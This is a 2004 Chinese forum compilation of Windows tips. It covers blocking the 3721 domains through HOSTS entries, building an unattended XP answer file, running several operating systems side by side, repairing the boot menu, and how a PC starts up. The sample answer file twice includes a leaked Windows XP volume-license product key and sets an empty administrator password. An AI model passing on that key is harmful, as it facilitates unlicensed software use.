HOSTS文件是Windows里面自带的将主机名称映射到 IP 地址的一个文本格式的文件，在Win98里面，他的名字叫做HOSTS.SAM，一般C:\Windows里面，如果C:\Windows里面没有，大家可以搜索得到，而在Win2000/XP里面，他的名字叫做HOSTS，没有扩展名，位于\%Systemroot%\System32\Drivers\Etc 文件夹中（%Systemroot%指系统安装路径）。无论是在Win98还是WinXP里面，我们都可以利用HOSTS这个文件屏蔽3721。操作步骤如下：
我们用记事本打开这个文件，一般会看到
Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
我们把下面一段话加入在最后面，然后保存就可以屏蔽3721了。
127.0.0.1 3721.com #3721网络实名
127.0.0.1 3721.net #3721网络实名
127.0.0.1 cnsmin.3721.com #3721网络实名
127.0.0.1 cnsmin.3721.net #3721网络实名
127.0.0.1 download.3721.com #3721网络实名
127.0.0.1 download.3721.net #3721网络实名
127.0.0.1 www.3721.com #3721网络实名
127.0.0.1 www.3721.net #3721网络实名

如果你想解除屏蔽，只需要把上面自己添加的内容删除即可。
不足的地方：以后不能访问3721的站点。
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:18　　 标题: 整理了七个小时的东东！[申请加精]

十五。★★★讲解Windows XP无人值守自动安装
Windows XP无人值守全自动安装
我们知道，若以一般的方式进行安装，在安装过程中安装程序会多次要求用户来输入一些设置信息，如用户名、单位名、序列号、时区等，所以我们必须守在爱机旁直到整个安装过程结束，等待的时间总是漫长的，而不管您的爱机是奔几。

    其实Microsoft对Windows那漫长的手工安装过程有了对策，设计了个无人值守全自动安装的功能(Unattended Installation of Windows xp)，此举的确大大地节省了无数用户的宝贵时间。用户可以事先将安装过程中所要回答的信息通过安装管理器(setupmgr.exe)设置好，将其制成一个文件(UNATTEND.TXT)，这个文件就称为应答文件。安装程序可调用应答文件，以实现无人值守全自动安装。而笔者又对无人值守全自动安装功能的操作方法作了一些改进，变安装初期手工输入命令的过程为软盘引导、自动批处理文件执行，更是一劳永逸地解放了您的双手，只要您花上三五分钟，其余的时间您愿作什么就作什么，是喝咖啡还是喝牛奶，是您自己的事，待会儿再来看您的爱机定是涣然一新。

    Windows xp 安装方法无非是两种：硬盘安装和光盘安装，下面就分别介绍这两种安装方法的引导软盘制作方法和无人值守全自动安装应答文件(UNATTEND.TXT)的制作方法。
一、从硬盘安装

    (1)在纯DOS下用format A:/s 处理一张软盘；

    (2)在该盘里建立文件Config.sys，并编辑命令行：
    device=C:\windows\himem.sys
    用以加载windows的系统信息文件himem.sys，好让DOS系统能运行smartdrv.exe

    (3)在该盘里建立文件Autoexec.bat，并编辑命令行：
    C:\windows\smartdrv.exe
    X:\i386\winnt/u:\i386\UNATTEND.TXT /s:X:\i386 /t:Z:
    X盘代表Windows xp的安装文件夹I386所在的逻辑盘，Z则代表Windows xp系统被安装在的逻辑盘，

    UNATTEND.TXT是事先用Windows 安装管理器制作的无人值守全自动安装应答文件。(后面将谈到UNATTEND.TXT的制作)

    (4)把主板CMOS的设置临时改为由软盘、硬盘、光盘引导；

    (5)用此盘引导，在软驱灯熄灭后就把软盘取出，正常情况下应该是万事大吉了。

    二、从光盘安装

    (1)在纯DOS下用format A:/s 处理一张软盘；

    (2)把无人值守全自动安装应答文件unattend.txt拷进软盘里(其实把此文件放在也无所谓，只要设置好路径，让安装程序自然会找到它)；

    (3)在软盘里创建文件Config.sys，并编辑命令行：

    device=C:\windows\command\ebd\oakcdrom.sys/d:mscdxxx
    device=C:\windows\himem.sys

    (4)在盘里创建文件Autoexec.bat，并编辑命令行：

    C:\windows\command\mscdex.exe/d:mscdxxx
    C:\windows\smartdrv.exe
    X:\I386\winnt/u:A:\unattend.txt /s:X:\i386 /t:Z:

    Config.sys里的命令行
    device=C:\windows\command\ebd\oakcdrom.sys/d:mscdxxx和Autoexec.bat里的命令行C:\windows\command\mscdex.exe/d:mscdxxx都是为了在纯DOS下加载光驱。值得一提的是，文件oakcdrom.sys只能到启动软盘里去拷贝，Config.sys里的命令行就改为device= oakcdrom.sys/d:mscdxxx，注意：Config.sys和Autoexec.bat中的mscdxxx中的xxx可以为任意字符，但是二者必须相同。

    (5)把软盘和光盘一同放进机器里，把主板CMOS的设置临时改为由光盘、软盘引导：

    (6)用软盘引导，软驱灯会有第二次发光，这是系统在寻找并读取软盘里的应答文件Unattend.txt，软驱灯熄灭后把软盘取出，以后都是计算机的事了。
三、Winnt.exe的参数

    以上两种方法都涉及到Windows xp安装文件Winnt.exe，这里介绍Winnt.exe的参数 ：
    (1)．/r：<指定目录名>
    此参数可在安装时一起安装用户所指定目录（要包含在I386目录下）中的内容，如一些较旧的硬件设备可能不被Windows xp 自带的驱动程序所支持，那么我们可将其驱动程序所在的目录在安装时一并装入Winnt目录下。

    (2)．/rx：<指定目录名>
    此参数与上述参数功能相同，只是在安装后将这个用户指定的目录删除。

    (3)．/s：<路径名>
    默认情况下，安装程序在安装时会调用位于当前目录（即光盘I386目录）中的众多安装源文件。我们可先将I386目录全部复制到硬盘上，再用此命令参数如Winnt /s:c:\i386进行定位，以加快安装速度。

    (4)．/t：<分区名>
    默认情况下，安装程序用C盘作为安装时临时文件的存放空间，并在其上安装 Windows xp 。我们可用此命令参数进行更改，如Winnt /t:d: 。

    (5)．/u：<应答文件名>
    此参数可结合应答文件来实现无人看守的全自动安装。具体方法将在后文中介绍。

四、无人值守全自动安装应答文件的制作

    无人值守全自动安装应答文件UNATTEND.TXT是通过人值守全自动安装应答文件制作工具setupmgr.exe制作的，setupmgr.exe 位于安装盘SUPPORT目录的Tools子目录一个名为Deploy的CAB压缩文件中，它必须通过解压取得，至于如何解压，我想就不需介绍了。

    应答文件的制作方法:

    运行Setupmgr即可进入“Windows 安装管理器向导”开始制作应答文件
点击“下一步”后，选择“创建新的应答文件(c)”(
  若用户需要创建可复制本机配置的应答文件或修改已有的应答文件，则可选择相应的项。点击“下一步”后，选择应答文件用于“Windows 的无人参与安装(W)”
    点击“下一步”，选择安装平台为“Windows XP Professional(w)”
    点击“下一步”，注意这一步是关键，一定要将安装时的交互等级设为“全部自动(F)”(
在接受Microsoft许可协议后，制作向导便正式开始要求用户填写或设置诸如名称、单位、计算机名、管理员登录密码、显示设置、网络设置、加入工作组或域、时区、拨号代码、语言支持、浏览器设置、系统文件夹名、网络打印机、安装完后的自动运行命令、用于一并安装设备驱动程序的分发文件夹等信息，如图所示，有些内容可发先不填，最后生成名为“Unattend.txt”的应答文件。
照着说明一步一步做下去，一直到完成！
用记事本打开已制成的应答文件，我们可以看到刚才填写的内容都以一定的书写格式记录在此文件中。此时还可以作适当的修改，如核对产品序列号是否正确，修改产品序列号的方法为：在[UserData]项下加入“ProductID=FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8”（不包括外层引号）。另外，我们可再在[Unattended]项下修改“Repartition=Yes”（不包括引号，或=No）来设定是否在安装时将原有分区全部删除后建一NTFS的新分区。

    在[Unattended]项下修改“FileSystem=ConvertNTFS”（不包括引号，或=LeaveAlone）来设定是将安装分区格式化为NTFS文件系统，还是保持不变。
是一个无人值守全自动安装应答文件范例，其实您完全可以不用Microsoft的“Windows 安装管理器”，有些内容看不懂也不要紧，用记事本将以下范例中有关内容改一下，只要序列号正确就行，之后另存或粘贴到UNATTEND.TXT中，岂不更快更爽，

[Identification]
JoinWorkgroup =;
Microsoft Windows Codename Whistler Personal, Professional, Server, Advanced Server and
Datacenter
; (c) 1994 - 2000 Microsoft Corporation. All rights reserved.
; 无人参与安装应答文件示例
; 此文件包含如何自动安装或升级 Windows Codename
; Whistler，这样安装程序运行就不需要用户的输入。
;

[Unattended]
UnattendMode=FullUnattended
OemSkipEula=Yes
OemPreinstall=Yes
TargetPath=winxp

[Data]
AutoPartition=1
MsDosInitiated="0"
UnattendedInstall="Yes"

[TapiLocation]
CountryCode=86

[RegionalSettings]
LanguageGroup=10
Language=00000804

[SetupMgr]
DistFolder=C:\whistlerdist
DistShare=whistlerdist3

[UserData]
FullName = "您的用户名"
OrgName = "您的单位名"
ComputerName = 计算机名
ProductID=FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8

[GuiUnattended]
; 设置时区为中国
; 设置管理员密码为空
; 设置 AutoLogon为 ON 并登录
AdminPassword=*
EncryptedAdminPassword=NO
OEMSkipRegional=1
TimeZone=210
OemSkipWelcome=1
AutoLogon = on
AutoLogonCount = 1

[LicenseFilePrintData]
; 用于 Server 安装
AutoMode = "erServer"
AutoUsers = "5"

[GuiRunOnce]
; 列出当第一次登录计算机时您想启动的程序

[Display]
BitsPerPel = 8
XResolution = 800
YResolution = 600
VRefresh = 70

[Networking]
InstallDefaultComponents=Yes

[Identification]
JoinWorkgroup = 工作组

    注：要保证windows xp 的顺得安装，还必须做到以下三点：
    1、禁用计算机上运行的所有反病毒程序。如果这些反病毒程序在安装过程中仍然运行，则计算机可能会停止响应。请删除 Autoexec.bat、Config.sys 和 Win.ini 文件中对该程序的引用。
    2、对将反病毒能力固化在系统中的计算机，如果在 BIOS/CMOS 设置中启用了这种选项，则可能会收到有关“virus-like activity”或“Master Boot Record”更改的警告。必须允许做这些更改才能使安装过程顺利完成。
    3、必须要有足够的硬盘空间。 如硬盘空间不足可清空回收站、删除 Internet 浏览器的缓存文件夹中的内容、删除扩展名为 bak 和 tmp 的文件、删除不再使用的程序文件夹（确保先备份数据）来腾出相应的空间。
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:20　　 标题: 整理了七个小时的东东！[申请加精]

十六。★★★多操作系统共存技巧
一、合理分区
1．硬盘的分区格式：
FAT：即FAT16，支持的操作系统最多，从WIN98——WINXP都能识别。但磁盘的空间利用率较低，而且对每个分区的最大容量有一定的限制（约2GB），因此目前已趋于淘汰。
FAT32：FAT16改进格式磁盘的空间利用率比FAT16有显著的提高，目前应用的十分广泛。
NTFS：NTFS有俩大特色。一是更高的磁盘利用率，蔟的大小可以小到512字节，比FAT16的16K和FAT32的4K的效率要高的多。二是更好的稳定性，其文件系统具有很强的可恢复特性和非常强大的安全性，支持访问权限的设置和磁盘配额等高级功能。缺点是WIN9X系统无法直接识别，一些老版本的软件会出现不兼容的现象。
EXT2：支持标准UNIX文件类型，是大多数LINUX系统默认的分区格式，提供了分派长达255个字符的文件名的能力。
EXT3：基于EXT2之上的文件系统，它有一个主要的优点——记帐。该文件系统能减少系统崩溃后恢复文件系统所花的时间，所以该格式被广泛用在LINUX系统中。
Linux SWAP：交换分区被用于支持虚拟内，也就是系统正在处理的数据所需的内存不够时，部分数据会被写到LINUX的交换分区上。
VFAT：与windows相兼容的LINUX文件系统，支持长中文名。可以作为WINDOWS与LINUX交换文件的分区。
2．分区注意事项
安装系统的分区大小不应少于2G（3—5G比较合适），应该用单独的分区分别安装系统、程序以及保存数据，不要把垃垃圾圾的东东都往C盘里塞，这样会拖慢启动速度。还要合理选择分区的格式。
3．分区实例（以40GB的目前主流硬盘为例）
以Win98、Win2000和WinXP三系统为例：
C盘：安装Win98（3G左右、FAT32）
D盘：安装Win2000（4G左右、NTFS）
E盘：安装WinXP（4G左右、NTFS）
F盘：软件区（6G左右、FAT32），用来安装各种应用软件、工具软件。由于某些老版本的软件在NTFS下无法正常工作，因此选用FAT32。
G盘：共用区（6G左右、FAT32），用来存放三系统的公用资源和装游戏，既然是共用区FAT32是三个系统都能识别的文件格式。
H盘：数据区（10G左右、NTFS），用来存放你的个人数据，选用NTFS可以获得更高的安全性。
I盘：备份区（8G左右、FAT32），用来备份重要文件。把备份区放在最后，是有道理的，因为不少恶性病毒破坏数据是从第一个扇区开始的，这样可以留给我们一定的时间保护备份区。
对于某些有特殊需要的朋友可以合理调整一下，例如经常刻录光盘，可以考虑留一个1GB左右的分区，专门作为刻光盘时的数据过渡空间。
对于LINUX用户，除非是在LINUX下工作，否则如果仅仅是学习或尝试的目的，只需创建几个较小的EXT2和SWAP分区，把更多的空间留给常用的Windows。
4．分区格式转换
删除、重建法：适用于任何格式之间的转换，缺点也显而易见，分区中的数据会彻底丢失。
Convert命令法：Win2000和WinXP自带的转换工具，可将FAT无损转换为NTFS，命令格式如下：
Convert Volume/FS[/V] [/CvtArea:filename] [/NoSecurity] [/X]
不过这个命令不能进行逆向转换，也就是说无法将NTFS转换成FAT。
使用工具：常用的有Partition Magic。
二、实际安装：（以Win98、Win2000和WinXP三系统为例）
1．最简单的方法：
在BIOS下设置为光盘启动——放入98安装盘——安装98到C盘——放入2000安装盘——安装2000到D盘——放入XP安装盘——安装XP到E盘——一切OK简单省事
注意事项：安装各个系统时都应在BIOS下，不提倡在Windows下装另外的系统，这样常常会遇到一些意想不到的意外。
2．已经有XP或2000的情况下安装98和2000
最简单的方法：备份XP的引导文件ntldr和ntdetect, 因为98不会自动识别多操作系统，所以不能自动建立开机选择界面，因此先装98再装2000,然后恢复备份XP的引导文件到C盘.
笨办法：不分先后的辟喱啪啦全装好后，用XP的系统碟来修复XP。
3．注意事项：
每个分区最好只装一个系统，虽然进入系统正常，但运行Windows自带的软件出错，例如在2000中运行Outlook Express一切正常，98下却提示找不到MSOE.DLL，另外运行“系统信息”也会提示找不到MFC42U.DLL。因为Windows系列的默认路径和临时文件指向的目录大多相同，高级版本的安装程序会在不提示的情况下覆盖旧版本的Windows文件。
安装时应尽量从低版本到高版本的顺序安装，因为不管装不装在同一分区，系统的启动引导分区总是在第一分去即主分区。每个系统都会在C盘建立系统引导文件，如果不按顺序将造成旧版本的引导文件覆盖新版本，旧版本的引导文件无法识别新版本的系统，造成新版本系统无法登陆。（那个论坛的站长说：关键是三个系统是否装在同一个盘，如果分装在三个盘，就什么问题都没有，先装谁都可以……我~晕~那~~~~~~）
三、多操作系统的资源共享
1．软件共享：
绿色软件：对于绿色软件处理起来再简单不过，只需将软件单独存放在一个目录中，然后在每个操作系统中为该软件创建一个快捷方式就可以了。
普通软件：对于普通软件就不能用上面的方法了，下面介绍两种办法。
第一种：在一空分区（软件区）新建一文件夹，如F：\应用软件，然后在不同的操作系统中安装同一软件，当程序提示选择安装路径时，都把路径指向同一文件夹，这样就可以使多个操作系统共用一份软件，节省了磁盘空间。
第二种：第一种方法的缺点也是显而易见的，太费时了。一般情况下我们可以通过修改注册表的方法来实现共用。
以PhotoShop 6.0为例：首先在任意一Windows中安装PhotoShop 6.0。然后在注册表编辑器中找到[HKEY_LOCAL_MACHINE\Software\Adobe\Photo]主键将其导出保存为REG文件。进入其它的操作系统将刚才的REG文件导入，找到并运行PhotoShop.exe，就可以象完全安装一样使用了。（需要注意的是98、ME和2000、XP的注册表结构不同，所以在2000、XP中导出注册表键值时要将保存类型设置为“Win9X/NT4文件”，否则在98、ME、NT4中无法正常使用该注册表文件。反之，由于注册表文件向下兼容，所以在98、ME、NT4中导出的注册表文件可以正常地在2000、XP中使用）
以上两种方法可以解决大多数的软件的共享，但对某些杀毒软件无效。所以杀毒软件还是在每个系统的系统区里各安装一份吧。
2．IE临时文件夹的共享
在空分区上（共用区）新建一个文件夹，如：G:\IE临时文件夹。打开IE流览器，单击“工具”——“Internet选项”，在“常规”选项卡上选择“设置”——“移动文件夹”指向刚才建立的“IE临时文件夹”。每个操作系统都用这方法指向同一个文件夹，就可实现IE临时文件夹的共享。
3．“我的文档”的共享
在空分区上新建一个文件夹，如：H:\玄天尊的文档。在“我的文档”属性拦上选择“移动文件夹”指向刚才建立的“玄天尊的文档”。每个操作系统都用这方法指向同一个文件夹，就可实现“我的文档”的共享。
4．临时文件的共享
在空分区上新建一个文件夹，如：G:\Sharetmp。
98、ME中找到C:\AUTOEXEC.BAT文件，为其加入以下内容：
@echo off
Echo Setting G:\Sharetmp as Windows 9X/Me temporary Directory
Set tmp=G:\Sharetmp
Set temp=G:\Sharetmp
Echo Starting Windows…
2000/NT/XP则简单的多：
只要在“我的电脑”属性拦上选择“高级”——“环境变量”，把“XXXX用户的变量”中的TMP、TEMP的值用“编辑”选项改成刚才建立的G:\Sharetmp的路径，然后选择确定即可。
2、3、4对于单系统的朋友也不妨设置一下，有利于系统区的减肥哦。
另外还必须要注意的一点是以上操作应该在各个分区的格式都已经转换完毕后进行。举个例子：你在完成以上操作后，把装2000、XP的E、D盘转换成了NTFS，而98无法识别NTFS，这样在98下原先的F盘就变成了E盘。而装在F盘上的软件会由于在98中盘符的变化而无法用快捷方式打开，遇到这种情况可以到98的注册表编辑器中利用查找功能把原先的路径改为现在的路径就可以解决。
四、多操作系统的卸载与重装某一个系统
1．操作系统删除前的注意事项
A．备份重要数据
B．备份应用程序的相关设置
如果卸载后又重装了该系统，那么就最好在卸载前备份这些应用程序的用户配置，避免重新设置的麻烦。
方法：许多应用程序都会在Windows的安装目录下创建自己的配置信息文件，这些文件的扩展名一般都是：ini。只要在资源管理器中打开当前操作系统的安装目录（例：C:\Windows）。先将文件的排列设置为“按类型”，这样可以使ini文件都排在一起，然后选中所需的配置文件，将它们备份到其它安全位置就可以了。
有一些应用程序本身就设计了配置的导出与导入功能。如在Office XP程序中就可以使用“用户设置保存向导”功能保存程序的设置。
C．回收分区
由于安装了多个系统，不同的分区格式共存的情况比较多见，而9X系统无法识别NTFS格式的分区。例如在98/2000中卸载2000后，98无法回收NTFS分区。因此在卸载某一操作系统前应用Partition Magic等工具将各分区转换成各个系统都能识别的格式。
另外还要注意分区的激活、隐藏和加密问题。在卸载前养成检查分区的习惯，在卸载某一系统前要将该系统下进行的加密、压缩的分区进行取消加密、压缩。如果问题已经发生，可以系统管理员的身份对该分区的属性中的安全设置进行重新审核。
D．禁用格式化C盘
如果你想在多系统共存的情况下删除装在C盘的系统，则千万不能用格式化C盘的方法来卸载。因为引导文件ntldr和ntdetect都在C盘，一旦格式化C盘，ntldr和ntdetect将被删除，多系统的配置文件Boot.ini将丢失，造成剩余的系统也将无法启动。
2.以98/2000或XP下对98进行卸载为例：
a.备份重要数据
先从“运行”中输入“Command”命令，然后在DOS提示符下输入“SET”回车，“windir”和“winbootdir”这两个环境变量就会告诉用户有关系统路径的一切内容，然后就是对重要文件进行必要的备份。
b.在2000或XP中直接删除98
在2000或XP中将Windows98的目录、Program Files目录以及其它位置上的系统文件和目录直接删除。如果Program Files目录中还有可在其它系统中使用的软件，应该保留。先不要删除根目录下的系统引导文件。
c.编辑Boot.ini
在2000或XP中用记事本打开根目录下的Boot.ini文件，注意Boot.ini是个隐藏文件。打开Boot.ini后，找到包含有“Bootsect.dos”的参数行，把这一行全部删除，然后存盘退出。重启计算机时就不会出现98的引导选项。
3．在2000/XP中删除2000或XP为例：
先要检查是否有共用的文件夹，然后决定是“删”还是“留”，如果有加密的文件夹，因先解密。注意对某些重要的文件进行备份。
进入XP中将2000的系统文件夹及该系统中的用户配置等其它相关文件夹进行删除，注意千万不要删除系统的引导文件。
然后修改C盘根目录的Boot.ini文件
Boot.ini文件如下，例：
[boot loader]
timeout=10
default=multi(0)disk(0)rdisk(0)partition(2)\WINXP
[operating systems]
multi(0)disk(0)rdisk(0)partition(2)\WINXP="Microsoft Windows XP Profession-1 "/fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows 2000 Profession " /fastdetect
将卸载掉的系统在启动菜单中所对应的项删除即可。
4．以98、2000、XP共存的情况下重装98为例：
A．覆盖安装98后多系统引导菜单丢失的解决方法：
用XP的启动光盘启动计算机，在屏幕上出现“Windows XP Professional 安装程序”信息时按下“R”键进入“恢复控制台”。提示“要登录到哪个Windows安装？”，根据自己的需要选择，一般选1输入管理员密码就进入Windows XP“恢复控制台”了。执行“fixboot C：”，
并在接下来的确认问题中选“Y”，“恢复控制台”会提示一段信息，输入“Exit”重启计算机，启动菜单就恢复了。
B．格式化C盘重装98后多系统引导菜单丢失的解决方法：
前面已经说过在卸载或重装系统时禁用格式化C盘，不过犯这种错误的人不在少数。下面就以格式化C盘重装98后多系统引导菜单丢失为例来说说补救方法。
a.ntldr和ntdetect的恢复
ntldr和ntdetect文件在2000/XP的安装光盘的i386目录下，启动98将这两个文件拷贝到C盘根目录下。
b.Bootsect.dos的生成
先在98下执行“开始”——“关闭系统”——“重新启动计算机到MS-DOS”，然后打开debug,执行以下指令后，Bootsect.dos文件就生成了：
-NC:\bootsect.dos
-L 100 2 0 1
-rcx
:200
-w
-q
c.生成Boot.ini文件
生成Boot.ini文件的语法对大部分普通用户来说比较难懂（我自己也是一片糊涂帐），不过有个简单的方法，就是用2000/XP的“恢复控制台”生成。
用XP的启动光盘启动计算机，在屏幕上出现“Windows XP Professional 安装程序”信息时按下“R”键进入“恢复控制台”。提示“要登录到哪个Windows安装？”，根据自己的需要选择，一般选1输入管理员密码就进入Windows XP“恢复控制台”了。
输入Bootcfg/scan扫描所有的2000/XP安装程序，看是否符合自己的Windows系统安装。
Bootcfg扫描无误后，就要执行bootcfg/rebuild重建Boot.ini文件，具体操作步骤根据提示操作完成。
重启后2000/XP已经可以引导，但没有98的启动选项，还需自己添加。启动到XP，打开“C:\ Boot.ini”文件，在文件最后添加一行：C:\ =“Microsoft Windows 98 Second Edition”。重新启动计算机即可。
5．卸载2000/XP后遗留文件夹的访问方法
这也是一个经常遇到的问题，在卸载某一个2000/XP前未将该系统加密的文件解密造成无法访问。而且无论是用管理员用户登录，还是创建一个与原来同名的用户，甚至重新安装一个与卸载前一模一样的系统并设置一个与以前同名的用户，系统仍然是拒绝用户的访问请求。
其实解决这个后遗症的做法并不复杂，假设不能访问的文件夹为：E:\玄天尊的写真集
a.以管理员账户登录，选择不能访问的文件夹的“属性”——“安全”选项卡。此时列表中一般没有当前用户的名称。
b.选择“安全”——“高级”——“所有者”，此时默认的“将所有者更改为”列表中就有两个用户，一个是系统默认的Administraror，另一个是具有管理员权限的账户。比如当前登录的账户为Administraror，则选中列表中的Administraror，然后选中下面的“替换子容器及对象的所有者”，按“确定”后，系统提示：您没有阅读目录\??\ E:\玄天尊的写真集 中内容的权限。是否用“完全控制”替换目录的权限？如果选择“是”按钮，所有权限都将被替换。
选择“是”按钮，现在用户就可以对该文件夹进行访问和修改了。
XP修复安装的具体步骤了，步骤如下：
当屏幕显示Press any key to boot from CD（请按任意键开始从光盘执行引导）信息时, 则应按下任意键, 以便从Windows XP光盘重新引导系统。当您看到屏幕显示To setup Windows XP now（现在开始安装Windows XP）时, 请按下ENTER（回车）键, 然后, 当Welcome to Setup（欢迎安装）屏幕出现时, 再次按下ENTER（回车）键。请不要选择按下R键, 因为这样做会调用Recovery Console（恢复控制台）。
在Windows XP Licensing Agreement（Windows XP许可协议）屏幕上, 按下F8键表示接受许可协议。
请务必使您当前所安装的Windows XP版本在框内处于选中状态, 然后, 按R键开始对Windows XP进行修复。依照屏幕提示完成Setup（安装）操作
WinXP之后如何安装Win2000
这种方法只可应用于 FAT32 格式的硬盘上.
安装 Windows 2000
1) 用一张 Win98\Me 启动盘（支持光驱）启动你的电脑。
2) 将 Windows 2000 CD 放入你的光驱中。
3) 在 A: 提示符下输入 X:\I386\WINNT.EXE 这里 X: 是你的光驱盘符。
4) 下面开始安装 Windows 2000 到非 Windows XP 的安装分区中。
5) 安装完毕之后，在 Windows 2000 中重启电脑。
修复 Windows XP 引导信息
用你的 Windows XP CD 启动电脑。当到达 Setup or Repair（安装与修复）步骤时，选择修复。在修复控制台中，输入如下内容：
1) FIXBOOT, answer Yes
2) CD
3) ATTRIB -H NTLDR
4) ATTRIB -S NTLDR
5) ATTRIB -R NTLDR
6) ATTRIB -H NTDETECT.COM
7) ATTRIB -S NTDETECT.COM
8) ATTRIB -R NTDETECT.COM
9) COPY X:I386NTLDR C:
10) COPY X:I386NTDETECT.COM C:
X 是你光驱的盘符。
备份WinXP双启动菜单
双启动正常时，就备份C盘这几个文件（有的是隐藏和系统属性的。），以后只要只要用这些文件拷到C盘下即可恢复。
NTDETECT.COM
ntldr
MSDOS.SYS
IO.SYS
BOOTSECT.DOS
bootfont.bin
BOOT.INI
装三系统并存的教训
让Win98、Win2000和Linux三个操作系统并存。
    把原来没有装操作系统的两个FAT32分区的数据备份好后，就把这两个分区用《分区魔术师》分别转换成EXT2和SWAP格式。安装完成后，重新启动计算机，已经有Linux的双启动菜单（Linux/DOS）出现了。迫不及待地选Linux，终于进入了Linux系统，　　体验了新鲜感后，还是回到原来的操作系统看看有何异样吧。重新启动计算机，选DOS，再选Win2000，不妙!怎么进入启动界面动了一下就没了反应?难道Win2000和Linux不能共存?看过了书，应该没这问题的啊。仔细想想，在Windows下面，系统是不认识Linux的分区，结果Windows启动的时候，因为不认得那两个Linux分区就，把硬盘编号改过来了。问题也就出来了，我的Win98原来装在了C盘，Win2000装在原来的G盘，把原来两个FAT32分区转过来后，那G盘就在Windows系统中变成了E盘了，所以就导致了Win2000启动不了。赶紧重新启动，选Win98试试怎么样。系统如想象一样顺利进入。
    现在明白了，Win2000不能启动，并不是系统出错，仅仅是引导出了问题，那就好办，只要把Windows的引导修复通过修改“boot.ini”文件来实现，修改方式如下：
    boot loader
    timeout=5
    default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
    operating systems
    multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows 98"/fastdetect /KERNEL=LOGOOS.EXE
    multi(0)disk(0)rdisk(0)partition(3)WINNT="Microsoft Windows 2000 Professional"/fastdetect
    问题也就解决了。
    提示：在multi(0)disk(0)rdisk(0)partition(X)中的partition(X)是指定第X分区，可以填入你的系统安装的分区对应的数字。
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:21　　 标题: 整理了七个小时的东东！[申请加精]

十七。★★★计算机启动过程详解

打开电源启动机器几乎是电脑爱好者每天必做的事情，面对屏幕上出现的一幅幅启动画面，我们一点儿也不会感到陌生，但是，计算机在显示这些启动画面时都做了些什么工作呢？相信有的朋友还不是很清楚，本文就来介绍一下从打开电源到出现Windows的蓝天白云时，计算机到底都干了些什么事情。
    首先让我们来了解一些基本概念。第一个是大家非常熟悉的BIOS（基本输入输出系统），BIOS是直接与硬件打交道的底层代码，它为操作系统提供了控制硬件设备的基本功能。BIOS包括有系统BIOS（即常说的主板BIOS）、显卡BIOS和其它设备（例如IDE控制器、SCSI卡或网卡等）的BIOS，其中系统BIOS是本文要讨论的主角，因为计算机的启动过程正是在它的控制下进行的。BIOS一般被存放在ROM(只读存储芯片)之中，即使在关机或掉电以后，这些代码也不会消失。
    第二个基本概念是内存的地址，我们的机器中一般安装有32MB、64MB或128MB内存，这些内存的每一个字节都被赋予了一个地址，以便CPU访问内存。32MB的地址范围用十六进制数表示就是0～1FFFFFFH，其中0～FFFFFH的低端1MB内存非常特殊，因为最初的8086处理器能够访问的内存最大只有1MB，这1MB的低端640KB被称为基本内存，而A0000H～BFFFFH要保留给显示卡的显存使用，C0000H～FFFFFH则被保留给BIOS使用，其中系统BIOS一般占用了最后的64KB或更多一点的空间，显卡BIOS一般在C0000H～C7FFFH处，IDE控制器的BIOS在C8000H～CBFFFH处。
    好了，下面我们就来仔细看看计算机的启动过程吧。
    第一步： 当我们按下电源开关时，电源就开始向主板和其它设备供电，此时电压还不太稳定，主板上的控制芯片组会向CPU发出并保持一个RESET（重置）信号，让CPU内部自动恢复到初始状态，但CPU在此刻不会马上执行指令。当芯片组检测到电源已经开始稳定供电了（当然从不稳定到稳定的过程只是一瞬间的事情），它便撤去RESET信号（如果是手工按下计算机面板上的Reset按钮来重启机器，那么松开该按钮时芯片组就会撤去RESET信号），CPU马上就从地址FFFF0H处开始执行指令，从前面的介绍可知，这个地址实际上在系统BIOS的地址范围内，无论是Award BIOS还是AMI BIOS，放在这里的只是一条跳转指令，跳到系统BIOS中真正的启动代码处。
    第二步： 系统BIOS的启动代码首先要做的事情就是进行POST（Power－On Self Test，加电后自检），POST的主要任务是检测系统中一些关键设备是否存在和能否正常工作，例如内存和显卡等设备。由于POST是最早进行的检测过程，此时显卡还没有初始化，如果系统BIOS在进行POST的过程中发现了一些致命错误，例如没有找到内存或者内存有问题（此时只会检查640K常规内存），那么系统BIOS就会直接控制喇叭发声来报告错误，声音的长短和次数代表了错误的类型。在正常情况下，POST过程进行得非常快，我们几乎无法感觉到它的存在，POST结束之后就会调用其它代码来进行更完整的硬件检测。
    第三步： 接下来系统BIOS将查找显卡的BIOS，前面说过，存放显卡BIOS的ROM芯片的起始地址通常设在C0000H处，系统BIOS在这个地方找到显卡BIOS之后就调用它的初始化代码，由显卡BIOS来初始化显卡，此时多数显卡都会在屏幕上显示出一些初始化信息，介绍生产厂商、图形芯片类型等内容，不过这个画面几乎是一闪而过。系统BIOS接着会查找其它设备的BIOS程序，找到之后同样要调用这些BIOS内部的初始化代码来初始化相关的设备。
    第四步： 查找完所有其它设备的BIOS之后，系统BIOS将显示出它自己的启动画面，其中包括有系统BIOS的类型、序列号和版本号等内容。
    第五步： 接着系统BIOS将检测和显示CPU的类型和工作频率，然后开始测试所有的RAM，并同时在屏幕上显示内存测试的进度，我们可以在CMOS设置中自行决定使用简单耗时少或者详细耗时多的测试方式。
    第六步： 内存测试通过之后，系统BIOS将开始检测系统中安装的一些标准硬件设备，包括硬盘、CD－ROM、串口、并口、软驱等设备，另外绝大多数较新版本的系统BIOS在这一过程中还要自动检测和设置内存的定时参数、硬盘参数和访问模式等。
